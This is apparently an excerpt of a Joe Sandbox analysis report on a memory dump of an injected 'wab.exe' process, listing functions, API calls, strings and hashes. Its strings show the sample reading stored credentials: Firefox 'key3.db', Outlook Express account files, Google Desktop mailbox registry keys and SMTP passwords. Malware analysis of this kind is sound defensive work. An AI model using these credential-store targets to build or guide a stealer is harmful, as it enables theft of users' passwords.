                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memset$FileWrite_mbscpy_strlwrsprintfstrlen
                                                                                                                • String ID: <%s>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                                                • API String ID: 3699762281-1998499579
                                                                                                                • Opcode ID: 795a8691700f312257f705e85a86cce67b218055e3179b2cedf5ba95f87480a6
                                                                                                                • Instruction ID: d8254de8a9900f2911fb5d1c0b13fc0cc865a5027b69882d7a9a790f368f6919
                                                                                                                • Opcode Fuzzy Hash: 795a8691700f312257f705e85a86cce67b218055e3179b2cedf5ba95f87480a6
                                                                                                                • Instruction Fuzzy Hash: 49012B7294012877E721A719CC46FDABB6C9F54304F0500F7B50DF3082DBB8AB508BA4
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00409A32 Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ??3@
                                                                                                                • String ID:
                                                                                                                • API String ID: 613200358-0
                                                                                                                • Opcode ID: c45a219b033b3f4569339e018fe7ecbbef235cfad79d4e0063602ba8b31e0023
                                                                                                                • Instruction ID: b8efe39ffa321d4f2ce8ce974eba3160cbf96dc633dc1e2aadb4e529a4dc2577
                                                                                                                • Opcode Fuzzy Hash: c45a219b033b3f4569339e018fe7ecbbef235cfad79d4e0063602ba8b31e0023
                                                                                                                • Instruction Fuzzy Hash: A9F0F4726057855BD7209F6999C1A57F7D9BB98714791083FF189F3A81CB38FC404A18
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00409A98 Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT ref: 00409A3E
                                                                                                                  • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT ref: 00409A4C
                                                                                                                  • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT ref: 00409A5D
                                                                                                                  • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT ref: 00409A74
                                                                                                                  • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT ref: 00409A7D
                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 00409AB3
                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 00409AC6
                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 00409AD9
                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 00409AEC
                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 00409B00
                                                                                                                  • Part of subcall function 00407A55: ??3@YAXPAX@Z.MSVCRT ref: 00407A5C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ??3@
                                                                                                                • String ID:
                                                                                                                • API String ID: 613200358-0
                                                                                                                • Opcode ID: b0df650d73306e27691e5daf7003448de6eaa28b93c8488f2c6c21201bf7abc7
                                                                                                                • Instruction ID: 0e1833da384361268bbd99a4020487bffb4c29eeff2b5ca4c2d3cb4a232d8152
                                                                                                                • Opcode Fuzzy Hash: b0df650d73306e27691e5daf7003448de6eaa28b93c8488f2c6c21201bf7abc7
                                                                                                                • Instruction Fuzzy Hash: 3FF0A932F068B05BC2117B669002B0EB398AD81B2831A016FF8147B6D2CB3CBC504ADE
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00410777 Relevance: 7.5, APIs: 5, Instructions: 40COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00407107: memset.MSVCRT ref: 00407127
                                                                                                                  • Part of subcall function 00407107: GetClassNameA.USER32(?,00000000,000000FF), ref: 0040713A
                                                                                                                  • Part of subcall function 00407107: _strcmpi.MSVCRT ref: 0040714C
                                                                                                                • SetBkMode.GDI32(?,00000001), ref: 0041079E
                                                                                                                • GetSysColor.USER32(00000005), ref: 004107A6
                                                                                                                • SetBkColor.GDI32(?,00000000), ref: 004107B0
                                                                                                                • SetTextColor.GDI32(?,00C00000), ref: 004107BE
                                                                                                                • GetSysColorBrush.USER32(00000005), ref: 004107C6
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Color$BrushClassModeNameText_strcmpimemset
                                                                                                                • String ID:
                                                                                                                • API String ID: 2775283111-0
                                                                                                                • Opcode ID: 30732ddb99e3546892e286b48803550164489c166bef4c71f88bf4e2e56830df
                                                                                                                • Instruction ID: 687cb18978465a3feaaa07aa3b8de37e8775815fe2b8de28c5581ef0bdca0d30
                                                                                                                • Opcode Fuzzy Hash: 30732ddb99e3546892e286b48803550164489c166bef4c71f88bf4e2e56830df
                                                                                                                • Instruction Fuzzy Hash: AAF03135101109BBCF112FA5DC49ADE3F25EF05711F14812AFA25A85F1CBB5A990DF58
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0041479C Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 96COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004147CE
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                • String ID: winSeekFile$winTruncate1$winTruncate2
                                                                                                                • API String ID: 885266447-2471937615
                                                                                                                • Opcode ID: 3989f365befeb7fb84bae78e7a4911c3188eb7aafc144da4ed62710c54f6e9f9
                                                                                                                • Instruction ID: 76c2d8f9c45a6ab14154b13c081d04d7f34c1e3f6c53ca943db3ce1179081271
                                                                                                                • Opcode Fuzzy Hash: 3989f365befeb7fb84bae78e7a4911c3188eb7aafc144da4ed62710c54f6e9f9
                                                                                                                • Instruction Fuzzy Hash: 5C313175600700AFE720AF65CC41EABB7E8FB88715F104A2EF965932D1D734E8808B29
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00406AC7 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 63COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00406D01: CreateFileA.KERNEL32(eBD,80000000,00000001,00000000,00000003,00000000,00000000,004441A1,?,ACD,00444265,?,?,*.oeaccount,ACD,?), ref: 00406D13
                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,key3.db,00000143,00000000,?,00406C55,00000000,?,00000000,?), ref: 00406AEB
                                                                                                                • CloseHandle.KERNEL32(?,?,00406C55,00000000,?,00000000,?), ref: 00406B11
                                                                                                                  • Part of subcall function 00407902: ??3@YAXPAX@Z.MSVCRT ref: 00407909
                                                                                                                  • Part of subcall function 00407902: ??2@YAPAXI@Z.MSVCRT ref: 00407917
                                                                                                                  • Part of subcall function 00407560: ReadFile.KERNEL32(00000000,?,004441E4,00000000,00000000,?,?,004441E4,?,00000000), ref: 00407577
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$??2@??3@CloseCreateHandleReadSize
                                                                                                                • String ID: Ul@$key3.db
                                                                                                                • API String ID: 1968906679-1563549157
                                                                                                                • Opcode ID: 017d44aeec099e6ad840d6e86d2f8ec0eb2b3f662b3005ae3e25e14883e9f582
                                                                                                                • Instruction ID: 1a03c8060d8a16f0d136589656c0636480a797a3ae37aee6ed6b4138e5904ac9
                                                                                                                • Opcode Fuzzy Hash: 017d44aeec099e6ad840d6e86d2f8ec0eb2b3f662b3005ae3e25e14883e9f582
                                                                                                                • Instruction Fuzzy Hash: EA1181B1D00624ABCB10AF25DC8588E7FB5EF45364B15C177F80AEB291D638ED61CB98
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040E103 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _strcmpi$_mbscpy
                                                                                                                • String ID: smtp
                                                                                                                • API String ID: 2625860049-60245459
                                                                                                                • Opcode ID: c45caa4284447f7f2e2e6364178d5851a287a2bec06db597c6e622e98960e237
                                                                                                                • Instruction ID: 1dd5f7db1b4edf1a80ad81ce147274c535078e8a2a303909ef95c05f23963bac
                                                                                                                • Opcode Fuzzy Hash: c45caa4284447f7f2e2e6364178d5851a287a2bec06db597c6e622e98960e237
                                                                                                                • Instruction Fuzzy Hash: DB11C872500219ABEB10AB66CC41A8A7399EF40358F10453BE945F71C2EF39E9698B98
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040821D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61registryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                                                                                • memset.MSVCRT ref: 00408258
                                                                                                                  • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 004082A6
                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 004082C3
                                                                                                                Strings
                                                                                                                • Software\Google\Google Desktop\Mailboxes, xrefs: 00408230
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Close$EnumOpenmemset
                                                                                                                • String ID: Software\Google\Google Desktop\Mailboxes
                                                                                                                • API String ID: 2255314230-2212045309
                                                                                                                • Opcode ID: b9c6ba0a09f39c77023865a56f43d31249d27d4aeb116fb61def55debc704f1d
                                                                                                                • Instruction ID: e7ff4aa50d33639bacb2d5000aefce928628a80d8311d3545e17288fa3d3d8ee
                                                                                                                • Opcode Fuzzy Hash: b9c6ba0a09f39c77023865a56f43d31249d27d4aeb116fb61def55debc704f1d
                                                                                                                • Instruction Fuzzy Hash: 9D118F72408345ABD710EE51DC01EABBBACEFD0344F04093EBD9491091EB75D958C6AA
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040C26C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 0040C28C
                                                                                                                • SetFocus.USER32(?,?), ref: 0040C314
                                                                                                                  • Part of subcall function 0040C256: PostMessageA.USER32(?,00000415,00000000,00000000), ref: 0040C265
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FocusMessagePostmemset
                                                                                                                • String ID: S_@$l
                                                                                                                • API String ID: 3436799508-4018740455
                                                                                                                • Opcode ID: f9fe39f7a068bdda1ebd36b4f409f4e20a0398a8366c16793ed62aa8fa7a4232
                                                                                                                • Instruction ID: f4172cee4733ded4edf5c13384372fb960b3a31eee454cf66b40e3553cb76095
                                                                                                                • Opcode Fuzzy Hash: f9fe39f7a068bdda1ebd36b4f409f4e20a0398a8366c16793ed62aa8fa7a4232
                                                                                                                • Instruction Fuzzy Hash: 1411A172900158CBDF219B14CD457DE7BB9AF81308F0800F5E94C7B296C7B45A89CFA9
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040929C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 004092C0
                                                                                                                • GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                                                                                                                • _mbscpy.MSVCRT ref: 004092FC
                                                                                                                Strings
                                                                                                                • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 004092A9
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: PrivateProfileString_mbscpymemset
                                                                                                                • String ID: <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>
                                                                                                                • API String ID: 408644273-3424043681
                                                                                                                • Opcode ID: dda02bb9c94d4f17af39156b30a74aa4a90c932e0b7e9f3942217324440be20b
                                                                                                                • Instruction ID: a8dcbc571cfa5336c44be942190f1d9429afcf202dd246abef1f156f809eb6de
                                                                                                                • Opcode Fuzzy Hash: dda02bb9c94d4f17af39156b30a74aa4a90c932e0b7e9f3942217324440be20b
                                                                                                                • Instruction Fuzzy Hash: 02F0E0725011A83AEB1297549C02FCA779CCB0D307F1440A2B749E20C1D5F8DEC44A9D
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00407482 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 35COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _mbscpy
                                                                                                                • String ID: C^@$X$ini
                                                                                                                • API String ID: 714388716-917056472
                                                                                                                • Opcode ID: d9dcd15f5501d6044b59d83579e7760d9dc142544ad26eb0a5a2565b401737d3
                                                                                                                • Instruction ID: 848b4a5d233ab05c703a0d630411b91f0640a461eb42b4d170138ac17b774cf5
                                                                                                                • Opcode Fuzzy Hash: d9dcd15f5501d6044b59d83579e7760d9dc142544ad26eb0a5a2565b401737d3
                                                                                                                • Instruction Fuzzy Hash: F601B2B1D002489FDB50DFE9D9856CEBFF4AB08318F10802AE415F6240EB7895458F59
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00401000 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                                                                                                                  • Part of subcall function 00406FC7: _mbscpy.MSVCRT ref: 00407011
                                                                                                                • CreateFontIndirectA.GDI32(?), ref: 0040101F
                                                                                                                • SendDlgItemMessageA.USER32(?,000003EC,00000030,00000000,00000000), ref: 0040103E
                                                                                                                • SendDlgItemMessageA.USER32(?,000003EE,00000030,?,00000000), ref: 0040105B
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ItemMessageSend$CreateFontIndirect_mbscpymemset
                                                                                                                • String ID: MS Sans Serif
                                                                                                                • API String ID: 3492281209-168460110
                                                                                                                • Opcode ID: d4e5890e55cd272a0cdfb621d5336f544a59e77ca07302a9ad9f735f222c5d17
                                                                                                                • Instruction ID: 97d77737ff66efe52178e6fda6de2dc92fca71035f8b3f8e7b76904d62d162b3
                                                                                                                • Opcode Fuzzy Hash: d4e5890e55cd272a0cdfb621d5336f544a59e77ca07302a9ad9f735f222c5d17
                                                                                                                • Instruction Fuzzy Hash: F5F02775A4130477E7317BA0EC47F4A3BACAB41B00F044535F652B50E1D2F4A404CB48
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00407107 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 29COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ClassName_strcmpimemset
                                                                                                                • String ID: edit
                                                                                                                • API String ID: 275601554-2167791130
                                                                                                                • Opcode ID: bf6c2209122d7ccd6bf6d4d5b504d0ca7740a040d867409a121181f8c875a0cc
                                                                                                                • Instruction ID: 4378e7120b76b93f9ba7f3ad81c4d59275eb15acd3879ac3f183c71196eabbb1
                                                                                                                • Opcode Fuzzy Hash: bf6c2209122d7ccd6bf6d4d5b504d0ca7740a040d867409a121181f8c875a0cc
                                                                                                                • Instruction Fuzzy Hash: ADE09BB2C4016A6AEB21A664DC01FE5776CDF59704F0400B6B945E2081E6A4A6884A95
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040759E Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20stringCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: strlen$_mbscat
                                                                                                                • String ID: 3CD
                                                                                                                • API String ID: 3951308622-1938365332
                                                                                                                • Opcode ID: d1143cf22a6afbd37b374b0806e036797619bbf072935b8337c8bafa4bdf7e65
                                                                                                                • Instruction ID: 1107c6f19d6a4433d5fdc1d3c5cfb72f3531f1d81a70b052f8a244d3c085287a
                                                                                                                • Opcode Fuzzy Hash: d1143cf22a6afbd37b374b0806e036797619bbf072935b8337c8bafa4bdf7e65
                                                                                                                • Instruction Fuzzy Hash: 1BD0A77390C2603AE61566167C42F8E5BC1CFD433AB15081FF408D1281DA3DE881809D
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00443C44 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 15COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _mbscat$_mbscpy
                                                                                                                • String ID: Password2
                                                                                                                • API String ID: 2600922555-1856559283
                                                                                                                • Opcode ID: 8d83a753bd2278aecac4212cdf66134528e9acc94ce1ae697df6f496e3d29f98
                                                                                                                • Instruction ID: daa9138b3154c9efe9c83666f212cf2f945430f9457ac718319f22168f8299cd
                                                                                                                • Opcode Fuzzy Hash: 8d83a753bd2278aecac4212cdf66134528e9acc94ce1ae697df6f496e3d29f98
                                                                                                                • Instruction Fuzzy Hash: 5BC01202A4667032210275555D07F8E5818CE9279B704005BB90832113D61D965542EF
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00410D0E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • LoadLibraryA.KERNEL32(shell32.dll,00410DCA,00000104), ref: 00410D1C
                                                                                                                • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 00410D31
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                • String ID: SHGetSpecialFolderPathA$shell32.dll
                                                                                                                • API String ID: 2574300362-543337301
                                                                                                                • Opcode ID: bd9125e53ebb38e22ea027c358b92ac6a95cbb2b5ce42350ffb603c3f4eeef8b
                                                                                                                • Instruction ID: ef400fb4b1d3fc6097741d3c7ce2aeca37e2dca3c44752f23935f4d935815712
                                                                                                                • Opcode Fuzzy Hash: bd9125e53ebb38e22ea027c358b92ac6a95cbb2b5ce42350ffb603c3f4eeef8b
                                                                                                                • Instruction Fuzzy Hash: C9D0C9F8D063099AE7005BA1AD297167AB4E719312F041536A540A5263EBBCD094CE1D
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004326AD Relevance: 6.5, APIs: 3, Strings: 1, Instructions: 475COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memset
                                                                                                                • String ID: rows deleted
                                                                                                                • API String ID: 2221118986-571615504
                                                                                                                • Opcode ID: b98c805d9f7a15f03bb69ae15e6c6b0a921ed9a197951f9464e59faa98c73a57
                                                                                                                • Instruction ID: 17dfb349c3cd8fc2c2490db290532cf881f14abfa8d6012d9aa572d9710d7201
                                                                                                                • Opcode Fuzzy Hash: b98c805d9f7a15f03bb69ae15e6c6b0a921ed9a197951f9464e59faa98c73a57
                                                                                                                • Instruction Fuzzy Hash: D5028171E00218AFDF14DFA5D981AEEBBB5FF08314F14005AF914B7291D7B9AA41CBA4
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0041BC6C Relevance: 6.3, APIs: 5, Instructions: 82COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memcpy$memcmp
                                                                                                                • String ID:
                                                                                                                • API String ID: 3384217055-0
                                                                                                                • Opcode ID: a7e4a582387d1845e8bd5b90d9047dd349a2d991c238cbacbbbcfe7ad7334891
                                                                                                                • Instruction ID: 8228d9f6412a3e952053f7d3f56c39de874a44e07f5fc6281cc9d0b5593e34d3
                                                                                                                • Opcode Fuzzy Hash: a7e4a582387d1845e8bd5b90d9047dd349a2d991c238cbacbbbcfe7ad7334891
                                                                                                                • Instruction Fuzzy Hash: C8215172E102896BEB19DBA5D846FAF73FCEB84700F00446AB511D7281FB28E644C765
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0044338B Relevance: 6.3, APIs: 5, Instructions: 81COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ??2@$memset
                                                                                                                • String ID:
                                                                                                                • API String ID: 1860491036-0
                                                                                                                • Opcode ID: ebb40f1ae782bd27a9c9ebb170ff663f9279e29e1a89e233aa61efeea33ca50f
                                                                                                                • Instruction ID: bd2fcbe50e3d5b8ec1466eca70e60fda3411ba7e10a355e4f398212a99dd52d4
                                                                                                                • Opcode Fuzzy Hash: ebb40f1ae782bd27a9c9ebb170ff663f9279e29e1a89e233aa61efeea33ca50f
                                                                                                                • Instruction Fuzzy Hash: 973162B09107508FE751DF3A8845A16FBE4FF80B05F25486FD549CB2A2E779E5408B19
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00404888 Relevance: 6.3, APIs: 5, Instructions: 77COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memset$memcpy
                                                                                                                • String ID:
                                                                                                                • API String ID: 368790112-0
                                                                                                                • Opcode ID: e33439cddf26871f1b6b72d3f102fac71f305b2afc07238da9e6d18acb06c1a9
                                                                                                                • Instruction ID: 0e4d5a8aef3e538851842ff93af65fc880b0f2046ec3e537946e92548d274f73
                                                                                                                • Opcode Fuzzy Hash: e33439cddf26871f1b6b72d3f102fac71f305b2afc07238da9e6d18acb06c1a9
                                                                                                                • Instruction Fuzzy Hash: BB2162B650115DABDF11EE68CD41EDE77ACDF95304F0040A6B708E3151D2749F448B64
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040D2A3 Relevance: 6.3, APIs: 5, Instructions: 50COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memset$memcpy
                                                                                                                • String ID:
                                                                                                                • API String ID: 368790112-0
                                                                                                                • Opcode ID: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                                                                                                                • Instruction ID: 358c417c53aa398974aae77e4359fd90ac0a4dba5340dfd55ca125e4bb0c9b0b
                                                                                                                • Opcode Fuzzy Hash: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                                                                                                                • Instruction Fuzzy Hash: 8E01D8B5A40B406BE235AE25CC03F2AB3A8DF91714F400A2EF692676C1D7B8F509915D
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004257AA Relevance: 6.2, APIs: 4, Instructions: 181COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __allrem.LIBCMT ref: 00425850
                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00425885
                                                                                                                • __allrem.LIBCMT ref: 00425933
                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0042597B
                                                                                                                Memory Dump Source
